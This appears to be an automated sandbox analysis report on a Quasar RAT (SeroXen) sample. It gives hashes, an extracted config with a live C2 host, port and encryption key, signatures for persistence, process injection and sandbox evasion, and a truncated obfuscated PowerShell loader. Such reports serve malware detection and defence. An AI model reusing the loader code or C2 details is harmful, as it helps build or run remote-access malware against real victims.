Analysis
-
max time kernel
300s -
max time network
287s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 18:17
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
16e4226eddebe2148b46353c351ec570
-
SHA1
5879aab64c4d4c086f24807f85c3f1bec657db9c
-
SHA256
04f86ef6a2870bcaff958187d1bbf7281e6c8c1c1f2fbefddc11e3a379e4f9b9
-
SHA512
7fa89b0aee061fca53534c7e38dfa873235095e32f64e87d7a8457e765f804d8f2408e90b90a484ea3e9c18d1110a5667de9aab14d9d9e22911433e9da4cfd38
-
SSDEEP
6144:cMfPp5S6M1Xy0vjzilQA9QU9sX0bx4UmWOQ6rhxODbfFOqb:Rpg6M1i+jzilQoAVUmjJtx2fF5b
Malware Config
Extracted
quasar
3.1.5
SeroXen
tue-jake.gl.at.ply.gg:29058
$Sxr-NCZpRTaGL620kkY20c
-
encryption_key
0CaeSao9jSngJXRQGaoy
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3492-1-0x0000000000510000-0x000000000057C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2044 created 4464 2044 WerFault.exe YLyLEEe0GcIq.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exedescription pid process target process PID 3444 created 644 3444 powershell.EXE winlogon.exe PID 72 created 644 72 powershell.EXE winlogon.exe PID 1780 created 4464 1780 svchost.exe YLyLEEe0GcIq.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 4 IoCs
Processes:
Client.exeinstall.exeinstall.exeYLyLEEe0GcIq.exepid process 4984 Client.exe 4596 install.exe 4016 install.exe 4464 YLyLEEe0GcIq.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 4 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 8 IoCs
Processes:
OfficeClickToRun.exesvchost.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3444 set thread context of 3360 3444 powershell.EXE dllhost.exe PID 72 set thread context of 4780 72 powershell.EXE dllhost.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2720 4464 WerFault.exe YLyLEEe0GcIq.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 4536 schtasks.exe 1016 SCHTASKS.exe 3452 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\5fc140e6_0 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\5fc140e6_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\YLyLEEe0GcIq.exe%b{00000000-0000-0000-0000-000000000000}" svchost.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E195B012-BD0C-42C9-A91A-E81BF383ABDD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exeClient.exewmiprvse.exedllhost.exepid process 3444 powershell.EXE 3444 powershell.EXE 72 powershell.EXE 72 powershell.EXE 3444 powershell.EXE 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 4984 Client.exe 3360 dllhost.exe 3360 dllhost.exe 72 powershell.EXE 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 4984 Client.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 2788 wmiprvse.exe 72 powershell.EXE 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 3360 dllhost.exe 72 powershell.EXE 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4984 Client.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4984 Client.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4984 Client.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe 4780 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3344 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exeClient.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3492 Uni.exe Token: SeDebugPrivilege 4984 Client.exe Token: SeDebugPrivilege 3444 powershell.EXE Token: SeDebugPrivilege 72 powershell.EXE Token: SeDebugPrivilege 3444 powershell.EXE Token: SeDebugPrivilege 3360 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2644 svchost.exe Token: SeIncreaseQuotaPrivilege 2644 svchost.exe Token: SeSecurityPrivilege 2644 svchost.exe Token: SeTakeOwnershipPrivilege 2644 svchost.exe Token: SeLoadDriverPrivilege 2644 svchost.exe Token: SeSystemtimePrivilege 2644 svchost.exe Token: SeBackupPrivilege 2644 svchost.exe Token: SeRestorePrivilege 2644 svchost.exe Token: SeShutdownPrivilege 2644 svchost.exe Token: SeSystemEnvironmentPrivilege 2644 svchost.exe Token: SeUndockPrivilege 2644 svchost.exe Token: SeManageVolumePrivilege 2644 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2644 svchost.exe Token: SeIncreaseQuotaPrivilege 2644 svchost.exe Token: SeSecurityPrivilege 2644 svchost.exe Token: SeTakeOwnershipPrivilege 2644 svchost.exe Token: SeLoadDriverPrivilege 2644 svchost.exe Token: SeSystemtimePrivilege 2644 svchost.exe Token: SeBackupPrivilege 2644 svchost.exe Token: SeRestorePrivilege 2644 svchost.exe Token: SeShutdownPrivilege 2644 svchost.exe Token: SeSystemEnvironmentPrivilege 2644 svchost.exe Token: SeUndockPrivilege 2644 svchost.exe Token: SeManageVolumePrivilege 2644 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2644 svchost.exe Token: SeIncreaseQuotaPrivilege 2644 svchost.exe Token: SeSecurityPrivilege 2644 svchost.exe Token: SeTakeOwnershipPrivilege 2644 svchost.exe Token: SeLoadDriverPrivilege 2644 svchost.exe Token: SeSystemtimePrivilege 2644 svchost.exe Token: SeBackupPrivilege 2644 svchost.exe Token: SeRestorePrivilege 2644 svchost.exe Token: SeShutdownPrivilege 2644 svchost.exe Token: SeSystemEnvironmentPrivilege 2644 svchost.exe Token: SeUndockPrivilege 2644 svchost.exe Token: SeManageVolumePrivilege 2644 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2644 svchost.exe Token: SeIncreaseQuotaPrivilege 2644 svchost.exe Token: SeSecurityPrivilege 2644 svchost.exe Token: SeTakeOwnershipPrivilege 2644 svchost.exe Token: SeLoadDriverPrivilege 2644 svchost.exe Token: SeSystemtimePrivilege 2644 svchost.exe Token: SeBackupPrivilege 2644 svchost.exe Token: SeRestorePrivilege 2644 svchost.exe Token: SeShutdownPrivilege 2644 svchost.exe Token: SeSystemEnvironmentPrivilege 2644 svchost.exe Token: SeUndockPrivilege 2644 svchost.exe Token: SeManageVolumePrivilege 2644 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2644 svchost.exe Token: SeIncreaseQuotaPrivilege 2644 svchost.exe Token: SeSecurityPrivilege 2644 svchost.exe Token: SeTakeOwnershipPrivilege 2644 svchost.exe Token: SeLoadDriverPrivilege 2644 svchost.exe Token: SeSystemtimePrivilege 2644 svchost.exe Token: SeBackupPrivilege 2644 svchost.exe Token: SeRestorePrivilege 2644 svchost.exe Token: SeShutdownPrivilege 2644 svchost.exe Token: SeSystemEnvironmentPrivilege 2644 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Client.exeYLyLEEe0GcIq.exepid process 4984 Client.exe 4464 YLyLEEe0GcIq.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
Explorer.EXERuntimeBroker.exepid process 3344 Explorer.EXE 3892 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exeClient.exepowershell.EXEdllhost.exedescription pid process target process PID 3492 wrote to memory of 4536 3492 Uni.exe schtasks.exe PID 3492 wrote to memory of 4536 3492 Uni.exe schtasks.exe PID 3492 wrote to memory of 4536 3492 Uni.exe schtasks.exe PID 3492 wrote to memory of 4984 3492 Uni.exe Client.exe PID 3492 wrote to memory of 4984 3492 Uni.exe Client.exe PID 3492 wrote to memory of 4984 3492 Uni.exe Client.exe PID 3492 wrote to memory of 4596 3492 Uni.exe install.exe PID 3492 wrote to memory of 4596 3492 Uni.exe install.exe PID 3492 wrote to memory of 4596 3492 Uni.exe install.exe PID 3492 wrote to memory of 1016 3492 Uni.exe SCHTASKS.exe PID 3492 wrote to memory of 1016 3492 Uni.exe SCHTASKS.exe PID 3492 wrote to memory of 1016 3492 Uni.exe SCHTASKS.exe PID 4984 wrote to memory of 3452 4984 Client.exe schtasks.exe PID 4984 wrote to memory of 3452 4984 Client.exe schtasks.exe PID 4984 wrote to memory of 3452 4984 Client.exe schtasks.exe PID 4984 wrote to memory of 4016 4984 Client.exe install.exe PID 4984 wrote to memory of 4016 4984 Client.exe install.exe PID 4984 wrote to memory of 4016 4984 Client.exe install.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3444 wrote to memory of 3360 3444 powershell.EXE dllhost.exe PID 3360 wrote to memory of 644 3360 dllhost.exe winlogon.exe PID 3360 wrote to memory of 708 3360 dllhost.exe lsass.exe PID 3360 wrote to memory of 1008 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 772 3360 dllhost.exe dwm.exe PID 3360 wrote to memory of 736 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 640 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1068 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1156 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1172 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1208 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1268 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1344 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1420 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1456 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1524 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1532 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1540 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1696 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1764 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1772 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1872 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1892 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1960 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1976 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1796 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2052 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2136 3360 dllhost.exe spoolsv.exe PID 3360 wrote to memory of 2252 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2432 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2440 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2484 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2560 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2576 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2592 3360 dllhost.exe sysmon.exe PID 3360 wrote to memory of 2636 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2644 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 2692 3360 dllhost.exe svchost.exe PID 3360 wrote to memory of 1084 3360 dllhost.exe sihost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:772
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1b1ae0ec-3e96-4ee6-bfc3-8cba1e0816bf}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{03a3ca50-1156-4a20-94f2-ca77964b4370}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4780
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DeaEIfQEBMCB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NsHjWmKxGrPVdA,[Parameter(Position=1)][Type]$MFvbWoMOaN)$XbjwctSAgZK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+'e'+[Char](99)+''+'t'+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'yM'+[Char](111)+'d'+[Char](117)+'le',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+'leg'+[Char](97)+''+'t'+'e'+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+',Publ'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+'u'+'t'+'o'+''+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$XbjwctSAgZK.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$NsHjWmKxGrPVdA).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+'n'+'a'+''+'g'+''+[Char](101)+'d');$XbjwctSAgZK.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+'Ne'+[Char](119)+''+[Char](83)+'lo'+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+'l',$MFvbWoMOaN,$NsHjWmKxGrPVdA).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $XbjwctSAgZK.CreateType();}$jXBROHGhPwuix=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 